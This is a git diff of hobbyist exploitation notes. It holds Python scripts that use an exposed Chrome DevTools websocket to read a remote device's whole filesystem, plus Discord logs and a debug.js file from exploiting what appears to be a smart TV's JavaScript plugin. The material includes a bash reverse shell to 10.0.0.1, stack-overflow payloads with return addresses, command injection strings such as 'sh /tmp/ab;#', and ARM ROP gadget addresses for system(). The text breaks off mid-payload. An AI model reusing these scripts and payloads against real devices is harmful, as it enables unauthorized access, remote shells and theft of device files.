Yes... I forgot to commit during writeups etc.

files/12_dec_2018/README.md

@@ -0,0 +1,2 @@
+# 12 December 2018
+Not my greatest python work, but for a quick thing that I never had intended to release; it did its job.

files/12_dec_2018/files/config.json

@@ -0,0 +1,8 @@
+{
+	"ws": "192.168.2.60:9222/devtools/page/4133cee9-ac82-4404-b886-9032aee57018",
+	"root": "file:///",
+	"max-filesize": "16000000",
+	"output": "filesystem/sys",
+	"file-meta": "filesystem-meta/sys",
+	"output-meta": "filesystem-meta/sys"
+}

files/12_dec_2018/files/scrape_files.py

@@ -0,0 +1,157 @@
+import os
+import json
+from websocket import create_connection
+import glob
+import base64
+
+with open("config.json", "r") as f:
+	config = json.load(f)
+
+ws = create_connection("ws://{}".format(config["ws"]))
+
+javascript_func = """
+function load(file) {
+	let request = new XMLHttpRequest();
+	request.open('GET', file, false);
+	request.overrideMimeType('text\/plain; charset=x-user-defined');
+	request.send();
+
+	let data = request.responseText;
+	let output = "";
+
+	for (let i = 0; i < data.length; i++) {
+		let n = (data.charCodeAt(i) & 0xff).toString(16);
+		if (n.length == 1)
+			n = "0" + n;
+		output += n;
+	}
+
+	return output;
+}
+"""
+
+struct = {
+	"id": 0,
+	"method": "Unset"
+}
+
+struct_params = struct.copy()
+struct_params["params"] = {}
+
+struct_enable_runtime = struct.copy()
+struct_enable_runtime["method"] = "Runtime.enable"
+
+struct_evaluate = struct_params.copy()
+struct_evaluate["method"] = "Runtime.evaluate"
+struct_evaluate["params"]["expression"] = "console.log(\"missing code\")"
+struct_evaluate["params"]["objectGroup"] = "console"
+struct_evaluate["params"]["includeCommandLineAPI"] = True
+struct_evaluate["params"]["silent"] = False
+struct_evaluate["params"]["contextId"] = 0
+struct_evaluate["params"]["returnByValue"] = False
+struct_evaluate["params"]["generatePreview"] = True
+struct_evaluate["params"]["userGesture"] = True
+struct_evaluate["params"]["awaitPromise"] = False
+
+struct_compile_script = struct_params.copy()
+struct_compile_script["method"] = "Runtime.compileScript"
+struct_compile_script["params"]["expression"] = "console.log(\"missing code\")"
+struct_compile_script["params"]["sourceURL"] = ""
+struct_compile_script["params"]["persistScript"] = False
+struct_compile_script["params"]["executionContextId"] = 0
+
+def evalJavascript(script):
+	print("Executing: {}".format(script))
+
+	compile_msg = struct_compile_script.copy()
+	compile_msg["params"]["expression"] = script
+	send(compile_msg)
+
+	eval_msg = struct_evaluate.copy()
+	eval_msg["params"]["expression"] = script
+	data = send(eval_msg)
+
+	if data["result"]["result"]["type"] != "string":
+		return "undefined"
+	return data["result"]["result"]["value"]
+
+def send(data, everything = False):
+	glob.message_id += 1
+
+	if "params" in data and "contextId" in data["params"]:
+		data["params"]["contextId"] = glob.context
+	if "params" in data and "executionContextId" in data["params"]:
+		data["params"]["executionContextId"] = glob.context
+
+	data["id"] = glob.message_id
+	ws.send(json.dumps(data))
+
+	if everything:
+		recv = [json.loads(ws.recv())]
+		while "id" not in recv[-1] or recv[-1]["id"] != data["id"]:
+			recv.append(json.loads(ws.recv()))
+	else:
+		recv = json.loads(ws.recv())
+		while "id" not in recv or recv["id"] != data["id"]:
+			recv = json.loads(ws.recv())
+
+	return recv
+
+runtime = send(struct_enable_runtime, True)
+for runtime_data in runtime:
+	if "method" in runtime_data and runtime_data["method"] == "Runtime.executionContextCreated" and "params" in runtime_data and "context" in runtime_data["params"] and "auxData" in runtime_data["params"]["context"] and "isDefault" in runtime_data["params"]["context"]["auxData"] and runtime_data["params"]["context"]["auxData"]["isDefault"]:
+		glob.context = runtime_data["params"]["context"]["id"]
+print("Context set to ID: {}".format(glob.context))
+
+evalJavascript(javascript_func)
+
+remote_path = config["root"]
+scrape_path = config["output"]
+meta_path = config["file-meta"]
+
+path_offset = []
+
+def dig():
+	d = os.listdir(meta_path + "/" + "/".join(path_offset))
+	for p in d:
+		if os.path.isdir(meta_path + "/" + "/".join(path_offset) + "/" + p):
+			path_offset.append(p)
+
+			if not os.path.exists(scrape_path + "/" + "/".join(path_offset)):
+				os.makedirs(scrape_path + "/" + "/".join(path_offset))
+
+			dig()
+
+			path_offset.pop()
+		else:
+			#if os.path.exists(scrape_path + "/" + "/".join(path_offset) + "/" + p):
+			#	print("Skipping existing file {}".format(scrape_path + "/" + "/".join(path_offset) + "/" + p))
+			#	continue
+			
+			#print("Reading file: {}".format(meta_path + "/" + "/".join(path_offset) + "/" + p))
+			with open(meta_path + "/" + "/".join(path_offset) + "/" + p, "r") as f:
+				meta_data = int(f.readline())
+			
+			
+			#if meta_data > int(config["max-filesize"]) or meta_data == 0:
+			#	open(scrape_path + "/" + "/".join(path_offset) + "/" + p + "._maxsize", "w").close()
+			#	continue
+
+			if meta_data < 16000000:
+				#print("Skipping...")
+				continue
+			
+			print("Downloading... (expecting {} B)".format(meta_data))
+			data = evalJavascript("load(\"{}\")".format(remote_path + "/".join(path_offset) + "/" + p))
+
+			if data == "undefined":
+				with open(scrape_path + "/" + "/".join(path_offset) + "/" + p, "w") as f:
+					f.write("Error?")
+				continue
+
+			with open(scrape_path + "/" + "/".join(path_offset) + "/" + p, "wb") as f:
+				f.write(bytes([int(data[i:i + 2], 16) for i in range(0, len(data), 2)]))
+
+dig()
+
+ws.close()

files/12_dec_2018/files/scrape_struct.py

@@ -0,0 +1,153 @@
+import os
+import json
+from websocket import create_connection
+import glob
+
+with open("config.json", "r") as f:
+	config = json.load(f)
+
+ws = create_connection("ws://{}".format(config["ws"]))
+
+javascript_func = """
+function load(file) {
+	let request = new XMLHttpRequest();
+	request.open('GET', file, false);
+	request.send();
+	return request.responseText;
+}
+"""
+
+struct = {
+	"id": 0,
+	"method": "Unset"
+}
+
+struct_params = struct.copy()
+struct_params["params"] = {}
+
+struct_enable_runtime = struct.copy()
+struct_enable_runtime["method"] = "Runtime.enable"
+
+struct_evaluate = struct_params.copy()
+struct_evaluate["method"] = "Runtime.evaluate"
+struct_evaluate["params"]["expression"] = "console.log(\"missing code\")"
+struct_evaluate["params"]["objectGroup"] = "console"
+struct_evaluate["params"]["includeCommandLineAPI"] = True
+struct_evaluate["params"]["silent"] = False
+struct_evaluate["params"]["contextId"] = 0
+struct_evaluate["params"]["returnByValue"] = False
+struct_evaluate["params"]["generatePreview"] = True
+struct_evaluate["params"]["userGesture"] = True
+struct_evaluate["params"]["awaitPromise"] = False
+
+struct_compile_script = struct_params.copy()
+struct_compile_script["method"] = "Runtime.compileScript"
+struct_compile_script["params"]["expression"] = "console.log(\"missing code\")"
+struct_compile_script["params"]["sourceURL"] = ""
+struct_compile_script["params"]["persistScript"] = False
+struct_compile_script["params"]["executionContextId"] = 0
+
+def evalJavascript(script):
+	print("Executing: {}".format(script))
+
+	compile_msg = struct_compile_script.copy()
+	compile_msg["params"]["expression"] = script
+	send(compile_msg)
+
+	eval_msg = struct_evaluate.copy()
+	eval_msg["params"]["expression"] = script
+	data = send(eval_msg)
+
+	if data["result"]["result"]["type"] != "string":
+		return "undefined"
+	return data["result"]["result"]["value"]
+
+def send(data, everything = False):
+	glob.message_id += 1
+
+	if "params" in data and "contextId" in data["params"]:
+		data["params"]["contextId"] = glob.context
+	if "params" in data and "executionContextId" in data["params"]:
+		data["params"]["executionContextId"] = glob.context
+
+	data["id"] = glob.message_id
+	ws.send(json.dumps(data))
+
+	if everything:
+		recv = [json.loads(ws.recv())]
+		while "id" not in recv[-1] or recv[-1]["id"] != data["id"]:
+			recv.append(json.loads(ws.recv()))
+	else:
+		recv = json.loads(ws.recv())
+		while "id" not in recv or recv["id"] != data["id"]:
+			recv = json.loads(ws.recv())
+
+	return recv
+
+def make_dir(relative_path):
+	if not os.path.exists(scrape_path + "/" + "/".join(path_offset) + "/" + relative_path):
+		os.makedirs(scrape_path + "/" + "/".join(path_offset) + "/" + relative_path)
+
+def make_file(relative_path, size):
+	with open(scrape_path + "/" + "/".join(path_offset) + "/" + relative_path, "w") as f:
+		f.write(size)
+
+def isRecursive(arr):
+	return len(set(arr)) != len(arr)
+
+def handleResponse(code):
+	start = code.find("<script>")
+	while start != -1:
+		code = code[start + 8:]
+		start = code.find("<script>")
+		if not code.startswith("addRow("):
+			continue
+		
+		focus = code.find(");</script>")
+		if focus == -1:
+			continue
+		
+		args = code[7:focus].split(",")
+
+		for n in range(len(args)):
+			args[n] = args[n].strip('"')
+
+		name = args[0]
+		url = args[1]
+		is_dir = bool(int(args[2]))
+		size = int(args[3])
+
+		if url == "..":
+			continue
+		
+		if is_dir:
+			make_dir(url)
+
+			#if url in ["proc", "sys"]:
+			#	continue
+
+			path_offset.append(url)
+			if not isRecursive(path_offset):
+				handleResponse( evalJavascript("load(\"{}\")".format(remote_path + "/".join(path_offset))) )
+			else:
+				print("{} is recursive -> skipping!".format(remote_path + "/".join(path_offset)))
+			path_offset.pop()
+		else:
+			make_file(url, str(size))
+
+runtime = send(struct_enable_runtime, True)
+for runtime_data in runtime:
+	if "method" in runtime_data and runtime_data["method"] == "Runtime.executionContextCreated" and "params" in runtime_data and "context" in runtime_data["params"] and "auxData" in runtime_data["params"]["context"] and "isDefault" in runtime_data["params"]["context"]["auxData"] and runtime_data["params"]["context"]["auxData"]["isDefault"]:
+		glob.context = runtime_data["params"]["context"]["id"]
+print("Context set to ID: {}".format(glob.context))
+
+evalJavascript(javascript_func)
+
+remote_path = config["root"]
+scrape_path = config["output-meta"]
+
+path_offset = []
+
+handleResponse( evalJavascript("load(\"{}\")".format(remote_path + "/".join(path_offset))) )
+
+ws.close()

files/27_apr_2020/README.md

@@ -0,0 +1,2 @@
+# 27 April 2020
+This is just a dump of javascript notes of how things progressed and what we tried

files/27_apr_2020/discord.md

@@ -0,0 +1,119 @@
+# Discord messages of interest
+Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.
+
+> File: `tvapi_jsplugin.so` (288.38 KB)  
+> @Emily | Sunpy#5213 
+
+> @Emily | Sunpy#5213 `bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`  
+> @HoLLy#2750 
+
+> AmbiSet, AmbiGet  
+> @Jan4V#0289 
+
+> "A"*1048  
+> @Jan4V#0289 
+
+> File: `mcul.zip` (1.23 MB)  
+> @Emily | Sunpy#5213 
+
+> /3rd/internet_browser/browser  
+> @Jan4V#0289 
+
+> File: `browser` (269.67 KB)  
+> @Emily | Sunpy#5213 
+
+> `touch /tmp/hollyisawesome.txt`  
+> `echo "jan is somewhat awesome but not as much as holly" > /tmp/hollyisawesome.txt`  
+> @HoLLy#2750
+
+> 0x14108  
+> @Jan4V#0289 
+
+> /tmp/youtube_fore  
+> @Jan4V#0289 
+
+> "A"*1040  
+> 00043E8C  
+> AAAA  
+> 00014108  
+> 1040*"A" then 0x8C 0x3E 0x04 0x00 then 4 A's then 0x08 0x41 0x01 0x00  
+> @Jan4V#0289 
+
+> "A"*1048 then 0x3C 0x11 0x03 0x00  
+> @Jan4V#0289 
+
+> ![system(\"touch /tmp/youtube_fore\")](img/img0.png "img0")  
+> @Jan4V#0289 
+
+> File: `crashdump` (172.42 KB)  
+> @Emily | Sunpy#5213 
+
+> File: `crashdumps` (295.09 KB)  
+> @Emily | Sunpy#5213 
+
+> ![ErrorDetails](img/img1.png "img1")  
+> @Jan4V#0289 
+
+> `touch /tmp/jan4v.txt;exit;# then "A"*1013 then 0x30 0x61 0xB2 0x9E then "A"*4 then 0x08 0x41 0x01`  
+> @Jan4V#0289 
+
+> `"A"*1040 then 0x88 0x45 0xFF 0x9C then "A"*4 then 0x08 0x41 0x01`  
+> @Jan4V#0289 
+
+> ~/cmd  
+> @Jan4V#0289 
+
+> ``"A"*1036 then sh /tmp/ab;# then 0x3C 0x5F 0x01``  
+> with command in /tmp/ab  
+> @Jan4V#0289 
+
+> File: `crashdump` (177.15 KB)  
+> @Emily | Sunpy#5213 
+
+> sh /tmp/p_ 0x01 0x00  
+> `"A"*1040 then sh /tmp/ then 0x70 0x5F 0x01`  
+> @Jan4V#0289 
+
+> ```
+> root@ed70c2b24182:/# echo "$(echo -e '\x01')"
+> 
+> root@ed70c2b24182:/# touch "$(echo -e '\x01')"
+> root@ed70c2b24182:/# ls
+> ''$'\001'   bin   boot   dev   etc   home   lib   lib32   lib64   libx32   media   mnt   opt   proc   root   run   sbin   srv   sys   tmp   usr   var
+> root@ed70c2b24182:/# 
+> ```  
+> @HoLLy#2750 
+
+> ![LDMFD SP!, {R4,R11,PC}](img/img2.png "img2")  
+> @Jan4V#0289 
+
+> ``[browser_base]>[bws_app][Default]``  
+> @Jan4V#0289 
+
+> usbDetectInit  
+> @Emily | Sunpy#5213 
+
+> ``"A"*1036 then sh /tmp/ab;# then 0x70 0x5F 0x01 0x00``  
+> @Jan4V#0289 
+
+> `df>/tmp/b`  
+> @Shaddy#4422 
+
+> ``;;;;w>/tmp/b``  
+> @Jan4V#0289 
+
+> 15F70  
+> @Jan4V#0289 
+
+> /3rd/lib/libxtvapi.so  
+> @Jan4V#0289 
+
+> File: `libxtvapi.so` (63.46 KB)  
+> @Emily | Sunpy#5213 
+
+> ``/3rd_rw/xtv_log_on``  
+> oh yeah if you find the package of the files you sent to people before, that might be useful  
+> @Jan4V#0289 
+
+> I can probably just rezip it and upload  
+> @Emily | Sunpy#5213 

files/27_apr_2020/files/debug.js

@@ -0,0 +1,38 @@
+// Notes of things we tried
+
+window.Service = new TV_JSP();
+Service.tvServices.myPrintf("ls");
+
+Service.tvServices.advMsg(""); // ???
+
+
+new TV_JSP().tvServices.accessLocalStorage("read", "/tmp/jan4v.txt")
+
+new TV_JSP().tvServices.AmbiGet(0,x)
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
+
+
+new TV_JSP().tvServices.AmbiGet(0,"touch /tmp/jan4v.txt;exit;#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    String.fromCharCode(0x30) + String.fromCharCode(0x61) + String.fromCharCode(0xB2) + String.fromCharCode(0x9E) + "AAAA" +
+    String.fromCharCode(0x08) + String.fromCharCode(0x41) + String.fromCharCode(0x01)
+)
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    String.fromCharCode(0x88) + String.fromCharCode(0x45) + String.fromCharCode(0xFF) + String.fromCharCode(0x9C) + "AAAA" +
+    String.fromCharCode(0x08) + String.fromCharCode(0x41) + String.fromCharCode(0x01)
+)
+
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    "AAAAsh /tmp/" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+)
+
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    "sh /tmp/ab;#" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+)
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    "     >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+)

files/28_apr_2020/README.md

@@ -0,0 +1 @@
+# 28 April 2020

files/28_apr_2020/discord.md

@@ -0,0 +1,303 @@
+# Discord messages of interest
+Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.
+
+> ok so I found some stuff :^)  
+> ```// write primitive 4bytes
+> // looks relatively safe to call (crashes with a 1 deref in strstr)
+> PC = 0x23BCC
+> R4 = address+0x880
+> R11 = data
+> 
+> // system call (SP buffer)
+> PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer)
+> R4 = R11 = unused
+> 
+> // system call (R4 buffer)
+> // looks super safe
+> PC = 0x11D48 or 0x14108
+> R4 = address of ascii string for system()
+> R11 = unused
+> 
+> // system call (R4 buffer) but probably unsafe
+> PC = 0x2F3DC (super unsafe) or 0x2F52C
+> R4 = address of ascii string for system()
+> R11 = unused
+> ```  
+> these are the useful gadgets  
+> there seems to be a memory area that stays static between runs, and is in a good address range  
+> thus it might be possible to use the write primitive to write a buffer for system there  
+> @Jan4V#0289 
+
+> You will still have to catch me up with what I should do though xd  
+> @Emily | Sunpy#5213 
+
+> can you send me the js you have for the AmbiGet?  
+> I wanna make a nicer setup for this and we can try  
+> @Jan4V#0289 
+
+> ```js
+> new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA